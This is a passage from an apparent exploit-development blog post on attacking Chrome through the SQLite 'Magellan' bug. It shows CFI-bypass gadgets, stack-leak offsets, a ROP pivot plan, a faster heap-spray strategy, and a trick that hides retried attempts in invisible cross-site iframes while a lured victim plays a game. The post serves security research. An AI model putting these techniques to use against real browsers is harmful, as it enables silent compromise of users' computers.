.text:000000000404C6B8                 shl     rdx, 4
.text:000000000404C6BC                 movsxd  rax, dword ptr [rax+rdx+8] ; dword 0x818 => 0
.text:000000000404C6C1                 mov     rdx, [rdi+28h]
.text:000000000404C6C5                 mov     [rdx+8], rax
.text:000000000404C6C9                 add     dword ptr [rcx+0Ch], 1
.text:000000000404C6CD                 mov     eax, 1
.text:000000000404C6D2
.text:000000000404C6D2 locret_404C6D2:                         ; CODE XREF: sub_404C690+D↑j
.text:000000000404C6D2                 retn
.text:000000000404C6D2 sub_404C690     endp

This is not actually a perfect vfgadget, but it serves our purpose perfectly, and is simple enough the deal with. What this vfgadget gives is an AAW primitive, because at the time of call, $RDI points to attacker controlled payload. By doing a bit of puzzle matching, it is possible to create an AAW primitive that writes a controlled QWORD into an address of our choosing.

Now this brings up the next question. Where are we going to overwrite?
Because the entire binary is compiled with CFI, any function pointer would not be a good choice. Actually, the go-to method for bypassing CFI after gaining AAW is going for the stack return address. This is not possible on recent mobile platforms (Hello PAC and soon to be born companion, Memory Tagging), but the desktop counterpart Intel CET has not arrived yet, so the stack still remains a perfect and the most easiest target.

This brings up the next problem of actually finding the stack. This is easy once AAR is achieved. The stack can be found by following a list of pointers, and the return address can be calculated from the leaked values. Our AAW target was the return address for the above vfgadget. Once the AAW is triggered, it would write an attacker controlled value into the return address which the vfgadget was originally supposed to return to. After the vfgadget is done executing, it would return to our stack pivot gadget, and kick start the ROP chain. To find that return address, it was required to find the WebSQL Database thread’s stack. In order to find that stack address, we first searched for Chrome’s Main Thread stack address. The Main Thread’s stack address is sprinkled on the main stack’s heap, which resides right behind the Chrome image executable in memory. Since this is the main thread’s heap, it is brk‘d and grows right behind the Chrome image.

1
2
3
4
5
6
7
7f7b32c0e000-7f7b344a5000 r--p 00000000 08:01 18612380                   /opt/google/chrome/chrome
7f7b344a5000-7f7b344a6000 r--p 01897000 08:01 18612380                   /opt/google/chrome/chrome
7f7b344a6000-7f7b344c6000 r--p 01898000 08:01 18612380                   /opt/google/chrome/chrome
7f7b344c6000-7f7b3a9db000 r-xp 018b8000 08:01 18612380                   /opt/google/chrome/chrome
7f7b3a9db000-7f7b3aa11000 rw-p 07dcd000 08:01 18612380                   /opt/google/chrome/chrome
7f7b3aa11000-7f7b3afe9000 r--p 07e03000 08:01 18612380                   /opt/google/chrome/chrome
7f7b3afe9000-7f7b3b1ce000 rw-p 00000000 00:00 0

We heuristically searched for a value that looks like a stack address, and found the following.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
// Main stack
Index[14F01] : 7fffda39d4c0
Index[18226] : 7fffda39c890
Index[18261] : 7fffda39e000
Index[18262] : 7fffda39c110
Index[18A34] : 7fffda39d658
Index[38B5E] : 7fffda39dff8

Index[14F01] : 7fffda39d4c0
Index[18226] : 7fffda39c890
Index[18261] : 7fffda39e000
Index[18262] : 7fffda39c090
Index[18A34] : 7fffda39d658
Index[38B5E] : 7fffda39dff8

Index[14F01] : 7fff11006e30
Index[18226] : 7fff11006200
Index[18261] : 7fff11007000
Index[18262] : 7fff11005a00
Index[18A34] : 7fff11006fc8
Index[38B5E] : 7fff11006ff8

...
...

It was found that certain stack addresses from the Main Chrome Thread lied in the same location in every run, even across reboots. The one with the lowest index was chosen, because that is probably the one that was allocated during the most earliest phases of Chrome execution, so it could be assumed to be allocated there deterministically across different runs. Even if that’s not the case, we can use the AAR and do a heuristic search dynamically in javascript.

Next, we searched for a WebSQL Stack address within the Main Stack.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
// Database stack
Index[39AB] : 7faef6ae1a28
Index[39B6] : 7faef6ae1a10
Index[39B7] : 7faef6ae1a28

Index[39AB] : 7faef5d60a28
Index[39B6] : 7faef5d60a10
Index[39B7] : 7faef5d60a28
Index[3B21] : 7faef5d5ff00

Index[3AD9] : 7f94fc597a28
Index[3AE4] : 7f94fc597a10
Index[3AE5] : 7f94fc597a28
Index[3C4F] : 7f94fc596f00

...
...

The WebSQL stack index would change slightly in different runs. This was not a reliable way to leak the WebSQL stack. Perhaps the reason for this is that because on each different run, there are slight changes in chrome environments based on the saved data on disk, or maybe different data received from the Google servers upon each run would introduce a different sequence of functions to be run or maybe introduce an alloca with a different size, making the WebSQL data on the stack move around little bits at a time. However, there is another reliable way. We already have one of the main stack’s address leaked in the previous phase. This is probably an address of a stack variable that is used in a certain function’s stack frame. The thing is, if that function that emcompasses the leaked stack variable is somewhere way down in the stack, it would be relatively free of the stack variance that was described earlier. What this means is that for any other functions called further down in the stack frame, they will be called in a deterministic fashion, lowering the stack frame on each function call in a fixed amount deterministically. As it so happens, the distance between the leaked Main Stack variable and the WebSQL stack address residing on the Main Stack is constant, with a fixed distance of 0x1768. By subtracting 0x1768 from the first address leak, we get the location of the WebSQL stack address that we want to leak. This same concept applies to leak the address of our target return address on the WebSQL stack. Subtracting 0x9C0 from the second leaked value will yield the exact position of our target return address. Since we know the location of the return address, we can construct a COOP payload that will AAW a stack pivot gadget right on top of that address.

The entire process is illustrated below.

This is why we only need exactly one gadget to control $RIP. Because we can AAR our way to find the return address’s location within the stack. From here, it is just standard ROP to execve or system.
The Chrome executable is huge, being 130MB in size. This is because it is statically compiled to include every library excluding the standard ones into the Chrome executable. Therefore, there is no shortage of ROP gadgets to choose from. The only problem is that extracting the gadgets can take a very long time. On the first round of ROP gadget extraction, we weren’t able to find a suitable stack pivot gadget. This is because the ROP stack is littered with values from the AAW vfgadget, in order to make the AAW work properly. The stack pivot needs to dodge all of those values and pick up empty slots within the ROP stack. This led us to run the ROPgadget tool with –depth=20, which was running for 48 hours on a 130MB binary, inside a virtual machine. While we had ROPgadget running, we casually went through the remaining vfgadget list, in hope to find another relatively simple AAW vfgadget that does not litter the ROP stack too much. During that process, we found a completely different way to bypass the CFI.

Bypassing CFI by gaining direct code execution

It turns out that the statement “CFI is universally applied to all indirect function calls” is false. This was realized after discovering the following gadget.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
.text:0000000001C5C620 sub_1C5C620     proc near               ; CODE XREF: .text:loc_19B0F58↑j
.text:0000000001C5C620                 mov     rcx, [rdi+20h]
.text:0000000001C5C624                 mov     rax, [rdi+30h]
.text:0000000001C5C628                 add     rax, [rdi+28h]
.text:0000000001C5C62C                 test    cl, 1
.text:0000000001C5C62F                 jz      short loc_1C5C639
.text:0000000001C5C631                 mov     rdx, [rax]
.text:0000000001C5C634                 mov     rcx, [rdx+rcx-1]
.text:0000000001C5C639
.text:0000000001C5C639 loc_1C5C639:                            ; CODE XREF: sub_1C5C620+F↑j
.text:0000000001C5C639                 mov     rsi, [rdi+38h]
.text:0000000001C5C63D                 mov     rdi, rax
.text:0000000001C5C640                 jmp     rcx
.text:0000000001C5C640 sub_1C5C620     endp

It was awestrucking on the discovery of this vfgadget. It completely dodged the CFI, making a direct call to a virtual function voiding all checks. What is even more remarkable is that this gadget also provides $RDI and $RSI with a completely clean ROP stack to work with. It’s as if someone left it there with the intention of “Use THIS GADGET to bypass the CFI *wink* “. This vfgadget is clearly the winner of all vfgadgets. The Golden Vfgadget that bypasses CFI in one fatal blow. We give our sincere appreciation to whoever contributed to the making of this vfgadget.

All jokes aside, the only plausible reason to explain why this function was left out was because it operates on Tagged Pointers. It seems that the current CFI implementation baked in the compiler gets easily confused when doing direct arithmetic on pointer values. This is shown on line 8 in the above listing. Thanks to this vfgadget, we can use it to directly jump to the stack pivot gadget and ROP from there, entirely skipping AAW. In our exploit, the previous AAW method was used after finding the appropriate stack pivot gadget, but this one would have been much more preferable, had it been discovered earlier.

Making a Stealth Exploit by abusing Chrome’s Site Isolation

Chrome offers a mitigation called Site Isolation. Here is the description of Site Isolation, borrowed from the Chromium webpage.

Site Isolation has been enabled by default in Chrome 67 on Windows, Mac, Linux, and Chrome OS to help to mitigate attacks that are able to read otherwise inaccessible data within a process, such as speculative side-channel attack techniques like Spectre/Meltdown. Site Isolation reduces the amount of valuable cross-site information in a web page’s process, and thus helps limit what an attacker could access.

In addition, Site Isolation also offers more protection against a certain type of web browser security bug, called universal cross-site scripting (UXSS). Security bugs of this form would normally let an attacker bypass the Same Origin Policy within the renderer process, though they don’t give the attacker complete control over the process. Site Isolation can help protect sites even when some forms of these UXSS bugs occur.

There is additional work underway to let Site Isolation offer protection against even more severe security bugs, where a malicious web page gains complete control over its process (also known as “arbitrary code execution”). These protections are not yet fully in place.

To summarize, site isolation mitigates CPU side channel attacks, and protects against UXSS logic bugs. However, it does not protect against gaining UXSS after gaining remote code execution with a renderer bug. Site isolation is also interesting for another perspective, in an exploiter’s point of view. Here’s another quote borrowed from the site.

Site Isolation offers a second line of defense to make such attacks less likely to succeed. It ensures that pages from different websites are always put into different processes, each running in a sandbox that limits what the process is allowed to do. It will also make it possible to block the process from receiving certain types of sensitive data from other sites. As a result, a malicious website will find it more difficult to steal data from other sites, even if it can break some of the rules in its own process.

The important part is emphasized. What this means is that all frames that open a different site from the parent frame, are running in different processes. This can be observed with a little experimentation.

1
2
3
4
5
6
7
<h1>This is the parent Frame</h1>
 
<iframe src="http://externalist1.com:8080/innocent.html" width=100 height=100></iframe>
<iframe src="http://externalist2.com:8080/innocent.html" width=100 height=100></iframe>
<iframe src="http://externalist3.com:8080/innocent.html" width=100 height=100></iframe>
<iframe src="http://externalist4.com:8080/innocent.html" width=100 height=100></iframe>
<iframe src="http://externalist5.com:8080/innocent.html" width=100 height=100></iframe>
1
2
3
4
5
6
7
8
9
10
➜  site_isolation_test ps aux | grep chrome | grep -v grep | wc -l
6
➜  site_isolation_test ps aux | grep chrome | grep -v grep | wc -l
7
➜  site_isolation_test ps aux | grep chrome | grep -v grep | wc -l
8
➜  site_isolation_test ps aux | grep chrome | grep -v grep | wc -l
9
➜  site_isolation_test ps aux | grep chrome | grep -v grep | wc -l
10

As more iframes from different sites are added, more processes pop up. This is interesting in an exploiting point of view. What happens if an iframe from a different process crashes?

It does not take down the parent window along with it. It just crashes the process containing the iframe. Does it work with multiple iframes?

Confirmed. What if the iframe is barely visible?

The parent frame lives, and there is no visible indication on the screen that the child iframes crashed.

What this provides to an exploiter is three things.

  1. On every failed exploit attempt, a new iframe can be launched. This provides an exploit a retry attempt, practically an unlimited number of times.
  2. If the iframe is vanishingly small, there is no indication on the screen of exploit failure. The ‘Aww Snap!’ will be contained within the invisible iframe.
  3. Each iframe launches a new process, and all exploit activity will be contained within that process. Whatever busy activity happens in the parent frame will not affect the child frame.

These are great characteristics for an exploit. All of these factors will contribute in enhancing the reliability of an exploit, and make the exploit immune to failures.

For our exploit, since the exploit runs for a fair amount of time, we simulated a scenario where the victim was lured to play a game of Zelda, while the exploit is running in an iframe in the background. The developer console is opened in order to show the exploit working behind the scenes.


The exploit works on all Ubuntu versions, because all exploit primitives are based on the Chrome binary itself, and does not rely on any offsets from the system libraries. In order to actually pop the calculator, Chrome needs to be run with the –no-sandbox flag. Otherwise, the exploit needs to be packed with a reflective-elf payload that is armed with a sandbox escape to pop calculator.

The entire exploit code can be found on our github.

Increasing Speed and Reliability

We will first talk about reliability, because everything about it has been covered in the previous sections. In order to increase reliability, steps should be taken to find the sources of failures, and to fix them. The source of the unreliability has been discussed on each stage, and ways on how to avoid them. This obviously doesn’t cover all sources of failure. While fixing them one by one, new issues will appear and issues that were completely unexpected will also pop up and be added to the to-fix list. It would be wise to just fix the major sources of failures and leave the minor ones as is, until the reliability is increased to over 80%. Then, let the site isolation technique describe above handle the rest of the failures by retrying. That would be a good tradeoff for balancing between creating a good enough exploit, and time invested to increase reliability.

Now let’s talk about reducing the execution time of the exploit. The major source of delay is obviously the spraying phase. This has to be eliminated to increase speed. But spraying is an essential requirement for the exploit. How would it be possible to OOB write to a target object that is 2GB away from the source object, without spraying the heap? The answer to this is that, we preserve spraying, but instead, spray in an efficient way. How is this possible?

Let’s look at the following example.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(){
    unsigned long size = 0x80000000;
    unsigned char *chunk;
    int i;

    for(i=0; i<2; i++){
        chunk = malloc(size);
        printf("chunk : %p\n", chunk);
        memset(chunk, 1, 0x100);
    }

    printf("done!\n");
    return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
➜  malloc_test head /proc/19945/maps
00400000-00401000 r-xp 00000000 08:01 37357724                           /home/ex/testyo/malloc_test/test
00600000-00601000 r--p 00000000 08:01 37357724                           /home/ex/testyo/malloc_test/test
00601000-00602000 rw-p 00001000 08:01 37357724                           /home/ex/testyo/malloc_test/test
7fb5cf0fa000-7fb6cf0fc000 rw-p 00000000 00:00 0
7fb6cf0fc000-7fb6cf2ba000 r-xp 00000000 08:01 57675976                   /lib/x86_64-linux-gnu/libc-2.19.so

➜  malloc_test ./time_script ./test
chunk : 0x7f9770d4e010
chunk : 0x7f96f0d4d010
done!
1438 microsecond elapsed

The results show that even if the program successfully allocated 4GB amount of memory, it only took a mere 1 milisecond to complete. This is because Linux uses an optimistic memory allocation strategy. The memory is allocated, but it is not actually backed by physical pages until some data is actually written to that piece of memory. More importantly, since only 0x200 bytes are written to the 4GB chunk, all time for writing data on the heap is saved, while still being able to allocate a huge chunk of heap. This enables a situation where you can spray the heap very quickly, without having to write actual data to it. This is a great primitive because our jumping over 2GB heap spray does not require to have actual data in it. It just needs to make space on the heap for the OOB write to jump over. All we need to do is find such primitive.

In the course of building the exploit, such primitive was not actively searched for. However, just by taking a short glance at the commit logs of SQLite, there is a wealth of heap spray candidates to choose from, and some of them could very well meet the conditions described above.

SQLite is not the only source of finding such primitives. Since the TCMalloc heap is shared by all threads and managed by the Central Cache, heap sprays occurring from any other thread can make a good candidate. Spraying in Thread 1, and then spraying in Thread 2 will make the chunks in Thread 2 be adjacent with the ones sprayed in Thread 1. There will be a very small gap of a couple of pages, but basically, they will be pretty close to each other. Therefore, any heap spray from any kind of functionality in Chrome, that is backed by malloc/new will make a good candidate. Usually, the best place to look for such heap sprays are things that parse complex formats. One of the prime candidates would be font, or media parsing functionality. Finding this new heap spray primitive which could place arbitrary data on the heap, would fill in the missing piece of the alternative exploitation strategy described in Stage 10.

Before ending the blogpost, let’s talk about how to embrace these new primitives, and build a new exploitation strategy.

The new primitives will be named P1 and P2 respectively. P1 is a primitive to create a heap chunk of any size, without having to fill the entire content. P2 is a primitive to create a heap chunk of any size, and the ability to fill the chunk with attacker controlled arbitrary content. In order the refine the exploit strategy, the fts3 root node that contains our OOB chunk for apple, needs to be refined.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
static int fts3SegReaderNext(
  Fts3Table *p,
  Fts3SegReader *pReader,
  int bIncr
){
  int rc;                         /* Return code of various sub-routines */
  char *pNext;                    /* Cursor variable */
  int nPrefix;                    /* Number of bytes in term prefix */
  int nSuffix;                    /* Number of bytes in term suffix */

  // snipped for brevity

  pNext += fts3GetVarint32(pNext, &nPrefix);
  pNext += fts3GetVarint32(pNext, &nSuffix);
  if( nPrefix<0 || nSuffix<=0
   || &pNext[nSuffix]>&pReader->aNode[pReader->nNode]
  ){
    return FTS_CORRUPT_VTAB;
  }

  if( nPrefix+nSuffix>pReader->nTermAlloc ){
    int nNew = (nPrefix+nSuffix)*2;
    char *zNew = sqlite3_realloc(pReader->zTerm, nNew);
    if( !zNew ){
      return SQLITE_NOMEM;
    }
    pReader->zTerm = zNew;
    pReader->nTermAlloc = nNew;
  }

  rc = fts3SegReaderRequire(pReader, pNext, nSuffix+FTS3_VARINT_MAX);
  if( rc!=SQLITE_OK ) return rc;

  memcpy(&pReader->zTerm[nPrefix], pNext, nSuffix);
  pReader->nTerm = nPrefix+nSuffix;
  pNext += nSuffix;
  pNext += fts3GetVarint32(pNext, &pReader->nDoclist);

The vulnerable function is also pasted above for reference.
Term 1 is the same. Term 2 has been updated to reallocate the apple chunk into a 2GB chunk. The check on line 21 will be (0x3FFFC000 + 1) > 0, which will make it enter the if clause and reallocate the chunk based on the calculation on line 22, which is slightly less than 2GB. Let’s say, 1.9GB. Afterwards, the memcpy will merely copy 1 byte “A” at the middle of the 1.9GB chunk. This strikes away all the memcpy time, while still being able to allocate a huge 1.9GB chunk. The vulnerability is not actually triggered just yet, and Term 2 just serves the purpose of relocating the 0x10 byte apple chunk into a 1.9GB chunk. Next, Term 3 is parsed and the bug is triggered the same way it was in the original exploitation strategy. But since (0x7FFFFFFF + 1) is a negative value, the check on line 21 is bypassed and it runs straight towards the memcpy. The memcpy will OOB write at an address that is 0x7FFFFFFF bytes away from the start of the 1.9GB chunk, the same way it did in the previous stages. The only difference is that the apple chunk is not in a 0xa00 chunk, but this time, it is in a 1.9GB chunk.

The new exploitation strategy will be like the following.

This is the new refined exploit strategy to increase speed. Since most of the heap spraying is done with P1, which is lightning fast and doesn’t actually fill in any heap data, the entire spraying and probing process until Stage 7 will probably be reduced down to less than 10 seconds. This will actually make the exploit practical, and deployable in the real world. We haven’t actually gone down this route due to time constraints, but we present it here in case anyone wants to play with the concept.

Also, another thing worth mentioning is that this tactic could have probably been used to exploit Chrome on Windows. This is because apple no longer lives in the Low Fragmentation Heap, but now lives in a seperate heap, allocated by NtAllocateVirtualMemory. This makes it possible to have the 1.9GB chunk allocated at a relatively fixed location (which moves around a little due to the guard page size), and not being subject to the randomization of the LFH. To eliminate even the slight randomization completely, the Variable Size Allocation subsegment would also make a good target to place apple in. It would have been interesting to see this bug actually being used to compromise Chrome during Pwn2Own.

Conclusion

Finally, in terms of reliable N-Day exploits for Chrome, there are much better bugs that could achieve speed and reliability, due to the bug characteristics. The prime candidate for such bugs are those that occur in the V8 JIT engine, such as _tsuro‘s excellent V8 bug in Math.expm1. Our N-Day feed provides in-depth analysis and exploits for other kinds of V8 JIT bugs. Exodus nDay subscription can be leveraged by Red Teams to gain a foothold in the enterprise during penetration tests even when critical details about public vulnerabilities have been obscured (like the Magellan bug) or when it simply does not exist.

The post Exploiting the Magellan bug on 64-bit Chrome Desktop appeared first on Exodus Intelligence.

❌